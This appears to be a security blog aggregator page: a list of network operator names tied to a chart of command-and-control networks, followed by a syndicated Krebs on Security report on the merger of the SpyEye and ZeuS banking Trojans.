CERNET-ASN-BLOCK – California Education and Research Federation Network
CERT – Computer Emergency Response Team (CERT) – Coordination Center
CGINET-01 – CGI Inc
CHARLES-SCHWAB – Charles Schwab & Co., Inc.
CHARTER-NET-HKY-NC – Charter Communications
CHINA169-BACKBONE CNCGROUP China169 Backbone
CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
CHINA169-GZ China Unicom IP network China169 Guangdong province
CHINANET-BACKBONE No.31,Jin-rong Street
CHINANET-IDC-BJ-AP IDC, China Telecommunications Corporation
CHINANET-SH-AP China Telecom (Group)
CIPHERKEY – Cipherkey Exchange Corp.
CISCO-EU-109 Cisco Systems Global ASN – ARIN Assigned
CITEC-AU-AP QLD Government Business (IT)
CITelecom-AS
CITYNET – CityNet
CLARANET-AS ClaraNET
CLIX-NZ TelstraClear Ltd
CMCS – Comcast Cable Communications, Inc.
CMNET-BEIJING-AP China Mobile Communicaitons Corporation
CMNET-GD Guangdong Mobile Communication Co.Ltd.
CMNET-V4SHANDONG-AS-AP Shandong Mobile Communication Company Limited
CNCGROUP-GZ CNCGROUP IP network of GuangZhou region MAN network
CNCGROUP-SH China Unicom Shanghai network
CNIX-AP China Networks Inter-Exchange
CNNIC-DSNET-AP Shanghai Data Solution Co., Ltd.
CNNIC-WASU-AP WASU TV & Communication Holding Co.,Ltd.
CO-2COM-AS 2COM Co ltd.
COGECOWAVE – Cogeco Cable
COGENT Cogent/PSI
COLO4 – Colo4Dallas LP
COLOMBIA TELECOMUNICACIONES S.A. ESP
COLT COLT Technology Services Group Limited
COLUMBUS-NETWORKS – Columbus Networks USA, Inc.
COMCAST-33490 – Comcast Cable Communications, Inc.
COMCAST-33491 – Comcast Cable Communications, Inc.
COMCAST-36732 – Comcast Cable Communications, Inc.
COMCAST-7015 – Comcast Cable Communications Holdings, Inc
COMCAST-7725 – Comcast Cable Communications Holdings, Inc
COMCAST-HOUSTON – Comcast – Houston
COMHEM-SWEDEN Com Hem Sweden
COMNET-TH KSC Commercial Internet Co. Ltd.
Completel Autonomous System in France
COMSAT COLOMBIA
COMSTAR COMSTAR-Direct global network
CORBINA-AS Corbina Telecom
COVAD – Covad Communications Co.
CPMBLUE-AS-BD CPM BLUE ONLINE LTD.Transit AS Internet Service Provider, Dhaka
CRRSTV – CRRS-TV
CSC Computer Management and CSC Denmark
CSC-IGN-AUNZ-AP Computer Sciences Corporation
CSC-IGN-EMEA – Computer Sciences Corporation
CSC-IGN-FTW – Computer Sciences Corporation
CSLOXINFO-AS-AP CS LOXINFO PUBLIC COMPANY LIMITED
CSP-AS CSP
CSUNET-NW – California State University Network
CSXT-AS-1 – CSX Technology
CTIHK-AS-AP City Telecom (H.K.) Ltd.
CTS-MD I.S. Centrul de Telecomunicatii Speciale
CXA-ALL-CCI-22773-RDC – Cox Communications Inc.
CYBERVERSE – Cyberverse, Inc.
CYPRESS-SEMICONDUCTOR – Cypress Semiconductor
CYTA-NETWORK Cyprus Telecommunications Authority
DARLICS-AS Darlics ltd. provides IP transport and Internet
DATAGRUPA SIA _Datagrupa.lv_ Marijas 7 – 412a Riga, LV-1050, LATVIA
DCI-AS DCI Autonomous System
DECHO – Decho Corporation
DFINET DFi Service SA
DHL-AS DHL Systems Inc.
DHSINETNOC – DEPARTMENT OF HOMELAND SECURITY
DIGCOMM Digital communications, LTD
DIGITAL-TELEPORT – Digital Teleport Inc.
DIL-AP DIRECT INTERNET LTD.
DIN-AS TOMSKTELECOM AS
DINAS-AS PE Kuznetsova Viktoria Viktorovna
DINET-AS Digital Network JSC
Diveo do Brasil Telecomunicacoes Ltda
DK-ESS-AS Syd Energi Bredbaand A/S
DMSLABNET – DoD Network Information Center
DNC-AS IM Data Network Communication SRL
DNEO-OSP7 – Comcast Cable Communications, Inc.
DNIC-ASBLK-00721-00726 – DoD Network Information Center
DNIC-ASBLK-27032-27159 – DoD Network Information Center
DOGAN-ONLINE Dogan Iletisim Elektronik Servis Hizmetleri
DOMAINFACTORY domainfactory GmbH
DOMAINTOOLS – DomainTools, LLC
DONTELE-AS Telenet LLC
DOPC-AS
DOPC-AS-NGN
DOPC-AS-US
DREAMHOST-AS – New Dream Network, LLC
DREAMX-AS DREAMLINE CO.
DRWEB-AS Doctor Web Ltd
DSE-VIC-GOV-AS Department of Sustainability & Environment,
DSIJSC-AS DSI Autonomous system
DSLEXTREME – DSL Extreme
DTAG Deutsche Telekom AG
DWL-AS-IN Dishnet Wireless Limited. Broadband Wireless
DYNDNS – Dynamic Network Services, Inc.
EASYDNS EasyDNS Technologies, Inc.
EASYNET Easynet Global Services
EBAY – eBay, Inc
ECI-TELECOM-LTD ECI Telecom-Ltd.
EDGECAST – EdgeCast Networks, Inc.
EIRCOM Eircom
ELISA-AS Elisa Oyj
EMBARQ-WNPK – Embarq Corporation
EMBIT-AS BURTILA & Co. ELECTRON M.BIT SRL
EMC-AS12257 – EMC Corporation
EMCATEL
EMIRATES-INTERNET Emirates Internet
EMOBILE eMobile Ltd.
ENTEL CHILE S.A.
EPM Telecomunicaciones S.A. E.S.P.
EQUANT-ASIA Equant AS for Asian Region covering Japan
EQUINIX-EDMA-ASH-ASN – Equinix, Inc.
ERICSSON-APAC-MY-AS Ericsson Global Services. BUGS N&V APAC
ERX-SINGNET SingNet
ESRI – Environmental Systems Research Institute
ESS-PR-WEBMASTERS – ESS/PR WebMasters
EthioNet-AS
ETISALAT-MISR
ETPI-IDS-AS-AP Eastern Telecoms Phils., Inc.
ETSI Autonomous System
EURONET Online Breedband B.V. Global AS
European Space Agency
EUSKALTEL Euskaltel S.A.
EXCELL-AS Excellmedia
EXIM – Export Import Bank of the U.S
FACEBOOK – Facebook, Inc.
FANNIEMAE – Fannie Mae
FasoNet-AS
FASTMETRICS – Fastmetrics, LLC
FAST-TELCO Fast Telecommunications Company W.L.L.
FASTWEB Fastweb SpA
FAWRI-AS
FDA – Parklawn Computer Center / DIMES HQ
FIBREONE-AS fibre one networks GmbH, Duesseldorf
FITC-AS – FITC – FedEx International Transmission Corporation
FMAC-I-BILLING – Freddie Mac
FMI-NET-AS – Freeport-McMoran Inc.
FORATEC-AS Foratec Communication AS at Sverdlovsk, Tyumen, Perm regions
FORTINET-CANADA – Fortinet Inc.
FPT-AS-AP The Corporation for Financing & Promoting Technology
FRONTIER-AND-CITIZENS – Frontier Communications of America, Inc.
FRONTIER-FRTR – Frontier Communications of America, Inc.
FR-RENATER Reseau National de telecommunications pour la Technologie
FULLRATE Fullrate A/S
FX-PRIMARY-AS FX Networks Limited
GBLX Global Crossing Ltd.
GET-NO GET Norway
GHANATEL-AS
GIGAINFRA Softbank BB Corp.
GLOBAL-SPLK – Sprint International
GLOBE-TELECOM-AS Globe Telecoms
GOLDENLINES-ASN 012 Smile Communications Main Autonomous System
GOLDENTELECOM-UKRAINE Golden Telecom
GOOGLE – Google Inc.
GRAMEENPHONE-AS-AP GrameenPhone Ltd.
GSA-GOV – General Services Administration
GT-BELL – Bell Canada
Gtd Internet S.A.
GYRON ====
H3G-AS H3G S.p.A.
H3GUKNIE Hutchison 3G UK and Ireland Core AS
HANARO-AS Hanaro Telecom Inc.
HATHWAY-NET-AP Hathway IP Over Cable Internet
HETZNER-AS Hetzner Online AG RZ
HHES – HAMILTON HYDRO ELECTRIC SYSTEM
HINET Data Communication Business Group
HKNET-AP HKNet Co. Ltd
HKTIMS-AP PCCW Limited
HNS-DIRECPC – Hughes Network Systems
HOPONE-GLOBAL – HopOne Internet Corporation
HOSTEUROPE-AS AS of Hosteurope Germany / Cologne
HP-INTERNET-AS Hewlett-Packard Company
HTCL-IAS-HK-AP Hutchison Telephone Company Limited
HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd
HURRICANE – Hurricane Electric, Inc.
HUTCHISON-AS-AP Hutchison Global Communications
HUTCHVAS-AS Vodafone Essar Ltd., Telecommunication – Value Added Services,
IADB-NETWORKS – The Inter-American Development Bank
IAM-AS
IBM E-business Hosting Delivery
IBMCCH-RTP – IBM
IBMCCH-SBY – IBM
IBMDES-AS – IBM Dallas Engineering & Scientific
IBSNAZ Telecom Italia S.p.a.
IBURST-GH
ICONNECT-BD Planners Tower
IDK-NETWORK CJSC Interdnestrcom AS
IEUNET BT Ireland Backbone
IFX-NW – IFX Communication Ventures, Inc.
IHNET – IHNetworks, LLC
IINET iiNet Limited
IJ-NET – Internet Junction Corp.
ILX-ASN – THOMSON FINANCIAL
IN2CABLE-AP AS Number of In2cable.com (India) Ltd.
INDONET-AS-AP INDO Internet, PT
INDOSATM2-ID INDOSATM2 ASN
INEA-AS INEA S.A.
INET-AS-ID PT. Inet Global Indo
INETCOMM-AS INET LTD
I-NETPARTNER-AS I-NetPartner GmbH ASN
INETTEHNO Inet Tehno
INFINEON-AS Infineon AG
INFINEON-SG 8 Kallang Sector
INFLOW19294 – Inflow Inc.
INFOSPHERE NTT PC Communications, Inc.
INFOSTRADA Infostrada S.p.A.
INIT7 Init7 Global Backbone
INS-AS – AT&T Data Communications Services
Instituto Costarricense de Electricidad y Telecom.
Instituto Tecnológico y de Estudios Superiores de Monterrey
INTEGRATELECOM – Integra Telecom, Inc.
INTELSAT Intelsat Global BGP Routing Policy
INTEL-SC-AS – Intel Corporation
INTERNAP-2BLK – Internap Network Services Corporation
INTERNAP-BLK – Internap Network Services Corporation
INTERNAP-BLK – Internap Network Services Corporation
INTERNAP-BLK3 – Internap Network Services Corporation
INTERNAP-BLOCK-4 – Internap Network Services Corporation
INTERNETIA-AS Netia SA
INTERNET-PATH – Internet Path, Inc.
INTERNET-PRO-AS Internet-Pro Ltd
INTEROUTE Interoute Communications Ltd
INTERPHONE-AS Interphone Ltd.
INTERTELECOM Intertelecom
IPASAULE-AS _Interneta Pasaule_ SIA
IPG-AS-AP Philippine Long Distance Telephone Company
IPGOMA – THE INTERPUBLIC GROUP OF COMPANIES, INC.
IPNXng
IPO-EU IP-Only Telecommunication Networks AB
IQUEST-AS – IQuest Internet
IRONPORT-SYSTEMS-INC – Cisco Systems Ironport Division
IRS – Internal Revenue Service
IS
ISC-AS1280 Internet Systems Consortium, Inc.
ISKON ISKON INTERNET d.d. za informatiku i telekomunikacije
ISKRATELECOM-AS ISKRATELECOM ZAO
ISP-KIM-NET Kalush Information Network LTD
ISSC-AS – ISSC
ISW – Internet Specialties West Inc.
ITNS ITNS. NET SRL
ITSCOM its communications Inc.
JAWWAL Jawwal will be multihoming with us AS15975 and AS12975
JAZZNET Jazz Telecom S.A.
Jordan Data Communications Company LLC
JUNIPER-NETWORKS – Juniper Networks, Inc.
KABELBW-ASN Kabel Baden-Wuerttemberg GmbH & Co. KG
KAISER-NCAL – Kaiser Foundation Health Plan
KAMOPOWER – KAMO Electric Cooperative, Inc.
KAZTELECOM-AS JSC Kazakhtelecom
KHERSON-TS Kherson Telecommunication Systems Ltd.
KIXS-AS-KR Korea Telecom
K-OPTICOM K-Opticom Corporation
KSNET KSNet
KSNET-AS Kyivstar GSM
KVH KVH Co.,Ltd
LANTELECOM-AS Lan-Telecom AS Number
LATISYS-ASHBURN – Latisys-Ashburn, LLC
LATNETSERVISS-AS LATNET ISP
LDCOMNET NEUF CEGETEL (formerly LDCOM NETWORKS)
LEASEWEB LEASEWEB AS
LEVEL3 Level 3 Communications
LGCNS-AS – LG CNS America Inc.
LGDACOM LG DACOM Corporation
LGH-AS-KR LGHitachi
LGNET-AS-KR LG CNS
LINKdotNET-AS
LINKLINE – LinkLINE Communications, Inc.
LINKNET-ID-AP Linknet ASN
LOQAL-AS Loqal AS
LUCENT-CIO – Lucent Technologies Inc.
LUGANET-AS ARTA Ltd
LVBALTICOM-AS _Balticom_ JSC
LVLT594-598 – Level 3 Communications, Inc.
LYSE-AS Altibox AS
MAGNUS-AS TOV _Magnus Limited_
MANGOTELESERVICE-AS-BD Only private Owned IIG in Bangladesh
MAP Moscow Network Access Point
MASERGY-US Masergy US Autonomous System
MASSCOM – Massillon Cable Communications
MAXIS-AS1-AP Binariang Berhad
MBL-AS-AP Micronet Broadband (Pvt) Ltd.
MCAFEE – McAfee, Inc.
MCAFEE-COM – McAfee, Inc.
MCC OJSC _Moscow Cellular Communications_,
MCI-ASN – MCI
MCT-SYDNEY Macquarie Telecom
MDITNET-AS ITNET (ITPAY SRL)
MEDIASERV-AS Mediaserv
Mega Cable, S.A. de C.V.
MEGAPATH2-US – MegaPath Networks Inc.
METROTEL REDES S.A.
MF-KAVKAZ-AS Caucasus Branch of OJSC MegaFon AS
MF-NWGSM-AS North-West Branch of OJSC MegaFon Network
MFNX MFN – Metromedia Fiber Network
MICRON21-AS-AU-AP Micron21 Melbourne Australia Datacentre. Co-Location Dedicated Servers Web Hosting
MICROSOFT-CORP-AS – Microsoft Corp
MICROSOFT-CORP---MSN-AS-BLOCK – Microsoft Corp
MISD-NET – Macomb Intermediate School District
MIT-GATEWAYS – Massachusetts Institute of Technology
MOLDCELL_AS Moldcell SA Autonomous System
MOLDDATA-AS Administrator of the top level domain .MD,
MOLDTELECOM-AS Moldtelecom Autonomous System
MORENET – University of Missouri – dba the Missouri Research and Education Network (MOREnet)
MOTOROLA – Motorola, Inc.
MOTOROLA-PHX – Motorola, Inc.
MP-ELEKTRONIKA-AS MP ELEKTRONIKA Autonomous System
MPX-AS Microplex PTY LTD
MTNL-AP Mahanagar Telephone Nigam Ltd.
MTS-INDIA-IN 334,Udyog Vihar
MTSNET OJSC _Mobile TeleSystems_ Autonomous System
N9E7X5E3N1I2N4C – Nexen Inc.
NAWALA-AS-ID Asosiasi Warung Internet Indonesia (AWARI)
NAWRAS-AS Omani Qatari Telecommunications Company SAOC
NBLNETWORKS-AS Nebula Oy Autonomous System
NC-FUNB-AS – WACHOVIA CORP
NCNET-AS National Cable Networks
NEOLINK CJSC _ER-Telecom Holding_ Izhevsk branch
NERIM Nerim SAS
NET-ACCESS-CORP – Net Access Corporation
NET-AIG – American International Group (AIG) Data Center, Inc.
NETCOM-AS NetCom as Autonomous system
NETELLIGENT – Netelligent Hosting Services Inc.
NEWCOM-AS NEWCOM mirror object from ARIN
NEWCOM-ASN New Com Telecomunicatii SA
NEWEDGENETS – New Edge Networks
NEWSKIES-NETWORKS SES WORLD SKIES ARIN AS, for routing RIPE space.
NEWTT-IP-AP Wharf T&T Ltd.
NEXTGENTEL NEXTGENTEL Autonomous System
NEXTTELL-VRN-AS LLC NextTell-Voronezh AS Number
NG-AS NextGen Communications SRL
NIANET-AS nianet is a Danish carrier and Internet Service Provider
NO_NAME
NOC – Network Operations Center Inc.
NOKIA Nokia Internet
NOKIA-AS NOKIANET APAC Data Centre network
NOKIANET_DALLAS NOKIANET Dallas office
Nominum Global NameServer network
NOMINUM-SKYE1 – SKYE
NORDLINKS-AS S.C. _NordLinks_ S.R.L.
NORMA-PLUS-AS TOV Norma Plus
NORTHROP-GRUMMAN – Northrop Grumman
NOVELL – Novell, Inc.
NTL Virgin Media Limited
NTT do Brasil Telecomunicaoes Ltda
NTT-COMMUNICATIONS-2914 – NTT America, Inc.
NUMERICABLE NUMERICABLE is a cable network operator in France, offering TV,VOICE and Internet services
NUVOX – NuVox Communications, Inc.
NV-ASN 013 NetVision Ltd.
NYFX-RTR – NYFIX, INC
O1COMM – O1 COMMUNICATIONS
OCN NTT Communications Corporation
OFIDEN – OppenheimerFunds, Inc.
OMD-FNO Orange Moldova Fix Network Autonomous System
OMNITURE ====
OPENDNS – OpenDNS, LLC
ORANGE-BUSINESS-SERVICES-SOUTHEUR Equant Inc.
ORANGE-BUSINESS-SERVICES-UK Orange Business Services (formerly Equant) AS for UK
OSIS-PACOM – Joint Intelligence Center Pacific
OVH OVH
P4NET P4 Sp. z o.o.
PACIFIC-INTERNET-INDIA-ASN Pacific Internet India Pvt. Ltd.
PACIFIC-INTERNET-IX Pacific Internet Ltd
PACNET Pacnet Global Ltd
PAH-INC – GoDaddy.com, Inc.
PAIR-NETWORKS – pair Networks
PALTEL-AS PALTEL Autonomous System
PARTNER-AS Partner Communications Ltd.
PBTL-BD-AS-AP Pacific Bangladesh Telecom Limited.
PDX – PORTLAND INTERNETWORKS
PEER1 – Peer 1 Network Inc.
Pegaso PCS, S.A. de C.V.
PERSNET Korea Telecom Freetel
PI-AU Pacific Internet (Australia) Pty Ltd
PI-HK Pacnet Internet (Hong Kong) Limited
PIXNET-AS – Providers Internet Exchange
PKTELECOM-AS-PK Pakistan Telecom Company Limited
PLUSSERVER-AS PlusServer AG, Germany
POLYCOM – Polycom, Inc.
POWEREDCOM KDDI CORPORATION
Prima S.A.
PRIMORYE-AS Open Joint Stock Company _Far East Telecommunications Company_
PRINCETON-AS – Princeton University
PROBENETWORKS-AS Probe Networks
PRONET_LV SIA _PRONETS_
PROXAD Free SAS
PS-NETPLEX-AS – Perot Systems
PT KPN Internet Solutions
PTK-CENTERTEL-DSL-AS PTK Centertel Sp. z o.o.
PTLP-CORE – People_s Tel Limited Partnership
PTPRIMENET PT PRIME – Solucoes Empresariais de Telecomunicacoes e Sistemas S.A.
PUBNET1-AS KT
PUSAN-AS-KR Pusan National University
PWC-AS – PriceWaterhouseCoopers, LLP
Q9-AS – Q9 Networks Inc.
Q9-AS-BRAM – Q9 Networks Inc.
QNETCZ QNET CZ s.r.o.
QSC-1 QSC AG
QUALCOMM – Qualcomm, Inc.
QUALCOMM-BLR-AS-AP Qualcomm Inc. Bangalore AS, Developer of CDMA Technology India
QWEST – Qwest Communications Company, LLC
RACKSPACE – Rackspace Hosting
RADIOGRAFICA COSTARRICENSE
RAPID-LINK-AS RAPID LINK SRL
RAYA-AS
RCN-AS – RCN Corporation
RDSNET RCS & RDS S.A.
Rede Nacional de Ensino e Pesquisa
REEDLAN-AS ISP REEDLAN
RELARN RELARN-MSK
RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI
RELIANCEGLOBALCOM – Reliance Globalcom Services, Inc
RENAM RENAM Association
RIML-CORP-AS-3 – Research In Motion Limited
RIPE-NCC-AS RIPE Network Coordination Centre
RISC-SYSTEM – Rockwell Scientific Company
RMH-14 – Rackspace Hosting
RMIFL RM Education PLC – Internet for Learning
ROGERS-CABLE – Rogers Cable Communications Inc.
ROSTELECOM-AS JSC Rostelecom
ROSTOV-TELEGRAF-AS Rostovelectrosviaz_ of Public Joint Stock Company
RTCOMM-AS OJSC RTComm.RU
RTD ROMTELECOM S.A
RUSTAVI2ONLINEAS Caucasus Online LLC
RU-SURNET Uralsvyazinform, Chelyabinsk branch
RWT – RagingWire Telecommunications
SAFELINES The network of ISP Safelines,includes POPs in various cities
SAFENZ-TRANSIT-AS-NZ SafeNZ Networks LTD
SAITIS-NETWORK Saitis Network, N.Desir
SAMSUNGNETWORKS-AS-KR Samsung Networks Inc.
SAN-JUAN-CABLE – San Juan Cable, LLC
SASUSA SunGard Availability Services USA
SAVVIS – Savvis
SBIS-AS – AT&T Internet Services
SCARTEL-AS Scartel Ltd.
SCOTTS-AS – CITY OF SCOTTSBURG
SCRR-10796 – Road Runner HoldCo LLC
SCRR-11426 – Road Runner HoldCo LLC
SCRR-12271 – Road Runner HoldCo LLC
SCV-AS-AP SCV Broadband Access Provider
SDL-20-AS – Smithville Digital, LLC
SEAGATE-USA-MN-1 – Seagate Technology
SEEDNET Digital United Inc.
SELECTNET-AS – SelectNet Internet Services
SERBIA-BROADBAND-AS Serbia BroadBand-Srpske Kablovske mreze d.o.o.
SERVICENET-AP Internet service provision to Western
SGNET-AS-AP Singapore Government Network AS
SHAW – Shaw Communications Inc.
SIBNETWORKS-AS Siberian Networks
SIFY-AS-IN Sify Limited
SIGMANET-NIC LU MII AS
SIKA-AS Sika Informationssysteme AG
SITA SITA
sixtelecoms-as
SKTELECOM-NET-AS SK Telecom., Ltd.
SKYNET-SPB-AS SkyNet Ltd.
SKYVISION SkyVision Network Services
SLTINT-AS-AP Sri Lanka Telecom Internet
SOFTLAYER – SoftLayer Technologies Inc.
SOFTNET-AS-AP Software Technology Parks of India – Bangalore
SOLNET BSE Software GmbH
SONICDUO-AS AS for MegaFon-Moscow
SONOMA – Sonoma Interconnect
SONY-APAC-AP Sony – ASN for Asia Pacific
SOVAM-AS OJSC _Vimpelcom_
SPBMTS-AS Mobile TeleSystems, OJSC, MR North-West
SPCS – Sprint Personal Communications Systems
SPEAKEASY – Speakeasy, Inc.
SPECTRANET FIRST FIBRE BROADBAND NETWORK IN NEW DELHI, INDIA
Sprint US
SPRINTLINK – Sprint
SPRINTLINK-HOSTING – SPRINT, Business Serices Group
SS-NOC-AS – Straitshot Communications, Inc.
STARHUBINTERNET-AS StarHub Internet Exchange
STARNET-AS StarNet Moldova
STATEL-AS Stavropol branch of Southern Telecommunications Company
STEADFAST – Steadfast Networks
STOMI – State of Michigan, DMB-CNOC
STSN-SLC-UT-US – STSN GENERAL HOLDINGS, INC.
SUDDENLINK-COMMUNICATIONS – Suddenlink Communications
SUMTEL-AS-RIPE Summa Telecom
SUNCOMMUNICATIONS-AS JV _Sun Communications_ Autonomous System
SUNRISE Sunrise Communications AG
SUPERNET-PAKISTAN-AS-AP Supernet Limited Transit Autonomous System Number
SURFCONTROL-US-ASN Websense Hosted Security Network
SURFNET-NL SURFnet, The Netherlands
SWEETNET-AS Private entrepreneur Bliznichenko Vitalij Volodumirovich
SWISSCOM Swisscom (Switzerland) Ltd
SWITCH SWITCH, Swiss Education and Research Network
SWKO – SOUTHWEST KANSAS ONLINE
TACHYON-AS-ID PT Remala Abadi
TATA-AS TATA ISP
TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
TATTELECOM-AS Tattelecom.ru/Tattelecom Autonomous System
TC Radio Systems Autonomous System
TCH – TCH Network Services
TDC TDC Data Networks
TDDE-ASN1 Telefonica o2 Germany Autonomous System
TDN Tikona Digital Networks Pvt Ltd.
TEAM-CYMRU – Team Cymru Inc.
TE-AS TE-AS
TELCOMNET TelCom Ltd.
TELCOM-UA-AS _Telecomunikatsiina Companiya_ Ltd
TELE2
Telecom Argentina S.A.
TELECOMMD-AS ICS Networks Solutions SRL
Telecomunicacoes da Bahia S.A.
TELEFONICA CHILE S.A.
Telefonica de Argentina
Telefonica Empresas SA
TELEFONICA-DATA-ESPANA Internet Access Network of TDE
TELEKOM-AS TELEKOM SRBIJA a.d.
TELENERGO EXATEL S.A. Autonomous System
TELENET-AS Autonomous System of Teleset-Servis Ltd.
TELENET-AS Telenet N.V.
TELENOR-NEXTEL Telenor Norge AS
TELESC – Telecomunicacoes de Santa Catarina SA
TELESWEET-AS Telesweet ISP Autonomous System
TELETECH – TeleTech Holdings, Inc
Television Internacional, S.A. de C.V.
TELEZUG WWZ Telekom AG
TELIANET-DENMARK TeliaNet Denmark
TELIANET-SWEDEN TeliaNet Sweden
TELKOMNET-AS2-AP PT Telekomunikasi Indonesia
TELKOMSEL-ASN-ID PT. Telekomunikasi Selular
TELLCOM-AS Tellcom Iletisim Hizmetleri
Telmex Chile Internet S.A.
Telmex Colombia S.A.
TELSTRA Telstra Pty Ltd
TEOLTAB TEO LT AB Autonomous System
TERREMARK Terremark
TFN-TW Taiwan Fixed Network, Telco and Network Service Provider.
TFO-BOSTON – THOMSON FINANCIAL
THEPLANET-AS – ThePlanet.com Internet Services, Inc.
T-HT T-Com Croatia Internet network
TINET-BACKBONE Tinet SpA
TISCALI-UK Tiscali UK
TISNL-BACKBONE Telfort B.V.
TKPSA-AS TKP S.A. is 3S.pl network operator.
TKT-AS JSC TKT
TMIB-BD-AS-AP TM International Bangladesh Ltd. ISP, Gulshan-1,Dhaka-1212
TMN-AS TMN Autonomous System
TMNET-AS-AP TM Net, Internet Service Provider
TM-NETSYS-ASH – TicketMaster
TOMLINE Tomsk telecommunication company Ltd
TOTNET-TH-AS-AP TOT Public Company Limited
TPG-INTERNET-AP TPG Internet Pty Ltd
TPNET Telekomunikacja Polska S.A.
TRANSTEL S.A.
TRAVELERS – Travelers Property Casualty Corp.
TRENDMICRO Global IDC and Backbone of Trend Micro Inc.
TRENDMICRO Trend Micro Inc.
TRUENORTHCOMM – True North Communications
TSF-IP-CORE TeliaSonera Finland IP Network
TSU-SM – Texas State University – San Marcos
TTCLDATA
TTNET Turk Telekomunikasyon Anonim Sirketi
TTSL-MEISISP Tata Teleservices ISP AS
TULIP Tulip Telecom Ltd.
TURKCELL-AS TURKCELL ILETISIM HIZMETLERI A.S.
TVCABO-AS TVCABO Autonomous System
TWTC – tw telecom holdings, inc.
UAEXPRESS EXPRESS Radio Network
UARNET-AS Ukrainian Academic and Research Network
UA-SEECH Seech-Infocom NCC
UA-SMART-AS Broadcasting company _Smart_ Ltd
UCOM UCOM Corp.
UCSB-NET-AS – University of California, Santa Barbara
UCSC – University of California, Santa Cruz
UDMVT-AS OJSC VolgaTelecom branch in Udmurtia Republic AS Number
UECOMM-AU Uecomm Ltd
UKRBIT-NET-AS SPD Bilopol Roman Leonidovich
UKRTELNET JSC UKRTELECOM,
ULTRADNS – Centergate Research, LLC.
UMANITOBA – University of Manitoba
UMC-AS UMC Autonomous System
UMICH-AS-5 – University of Michigan
UMN Ural-TransTeleCom Autonomous System
UNI2-AS France Telecom Espana SA
Uninet S.A. de C.V.
UNINETT UNINETT, The Norwegian University & Research Network
UNISYS-6072 For routing issues, email hostmaster@unisys.com
UNISYS-AP-UI-AS-AP Unisys AsiaPac Intranet Access to Internet
UNISYS-AS-E – Unisys Corporation
Universidad Nacional de Colombia
University de Los Andes
UNL-AS – University of Nebraska-Lincoln
UNSPECIFIED
UPC UPC Broadband
UPITT-AS – University of Pittsburgh
URAN URAN Autonomous system
USAA – USAA
USI Uralsviazinform
UUNET – MCI Communications Services, Inc. d/b/a Verizon Business
UUNET-INT – MCI Communications Services, Inc. d/b/a Verizon Business
VEGA-OD-UA DCS Ltd.
VERISIGN-CORP – VeriSign Infrastructure & Operations
VERSATEL AS for the Trans-European Tele2 IP Transport backbone
VIA-NET-WORKS-AS PSINet Europe / VIA NET.WORKS international AS
VIAPASS-FR VIAPASS SAS
VIDEOTRON – Videotron Telecom Ltee
VIETEL-AS-AP Vietel Corporation
VINAKOM – VINAKOM COMMUNICATIONS
VINS – ViaWest
VIRGINIA-AS – University of Virginia
VITSSEN-SUWON-AS-KR Tbroad Suwon Broadcating Corporati
VMWARENET-1 – VMWare, Inc.
VNET-AS VNET ISP Bratislava, Slovakia, SK
VNPT-AS-VN Vietnam Posts and Telecommunications (VNPT)
VODAFONE_ICELAND Backbone Autonomous System
VODAFONE-IT-ASN Vodafone N.V.
VODANET International IP-Backbone of Vodafone
VOLIA-AS Kyivski Telekomunikatsiyni Merezhi LLC
VOLKSWAGEN Volkswagen AG, Wolfsburg 1
VRIS-AS-BLOCK – Verizon Online LLC
VSI-AS VSI AS
VTX-NETWORK VTX Services SA
VZB-AU-AS Verizon Australia PTY Limited
VZGNI-TRANSIT – Verizon Online LLC
WATEEN-IMS-PK-AS-AP National WiMAX/IMS environment
WAYPORT – AT&T Wi-Fi Services
Webex Communications, Inc.
WEBSENSE Websense, Inc.
WELLSFARGO – Wells Fargo & Company
WESTHOST – WestHost, Inc.
WESTNET-AS-AP Westnet Internet Services
WESTPUB-A – West Publishing Corporation
WICAM-AS WiCAM ISP Cambodia Peering AS
WIDEXS ion-ip B.V.
WINDSTREAM – Windstream Communications Inc
WIRELESSNET-ID-AP WIRELESSNET AS
WITCOM- Wiesbadener Informations – und Telekommunikations GmbH
WN-AS Private enterprise Gorbunov A.A.
WORLDBANK-AS – WORLD BANK
WORLDCALL-AS-LHR Worldcall Broadband Limited
WORLDNET-AS World Net & Services Co., Ltd.
WOW-INTERNET – WideOpenWest Finance LLC
WXC-AS-NZ WorldxChange Communications LTD
WYOMING – wyoming.com
XO-AS15 – XO Communications
XS4ALL-NL XS4ALL
XTRA-AS Telecom XTRA, Auckland, NZ
YAHOO-BANGALORE-AS-AP Yahoo Bangalore Network Monitoring Center
YAHOO-US – Yahoo
ZIGGO Ziggo – tv, internet, telefoon
ZIPNETBD-DKB-AS-AP Zipnet Limited DKB AS number

The following chart maps the location of more than 300 command and control networks that were used in these attacks. 299 of them were located in China.

The geographic location of the more than 300 control networks used in the attacks.

Krebs on Security: Revisiting the SpyEye/ZeuS Merger

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

In October 2010, I discovered that the authors of the SpyEye and ZeuS banking Trojans — once competitors in the market for botnet creation and management kits — were planning to kill further development of ZeuS and fuse the two malware families into one supertrojan. Initially, I heard some skepticism from folks in the security community about this. But three months later, security experts are starting to catch glimpses of this new hybrid Trojan in the wild, with the author(s) shipping a series of beta releases that include updated features on a nearly-daily basis.

It probably didn’t help that the first report of a blended version of SpyEye/ZeuS (referred to as SpyZeuS for the remainder of this post) — detailed in a McAfee blog post — turned out to be a scam. But a little more than a week ago, Trend Micro spotted snapshots and details of SpyZeuS components, noting that the author appears to have received help from other criminals in polishing this latest release; in particular, an add-on that grabs credit card numbers from hacked PCs, and a plugin designed to attack the anti-Trojan tool Rapport from Trusteer. (Trusteer’s Amit Klein addresses this component in a blog post here).

Seculert, a new threat alert service started by former RSA fraud expert Aviv Raff, includes some screen shots of the administrative panel of SpyZeuS that show the author trying to appeal to users of both Trojans, by allowing customers to control and update their botnets using either the traditional ZeuS or SpyEye Web interface.

The hybrid SpyZeuS Trojan lets users interact with bots via the ZeuS control panel (left) or the SpyEye interface.

Raff said the author(s) has been adding new features to both the bot and the control panels nearly every day.

“This is under heavy development at the moment,” Raff said. “That’s why the version we wrote about was called 1.3.05 Beta, because it’s still not the [general availability] version. The author is still trying things out.”

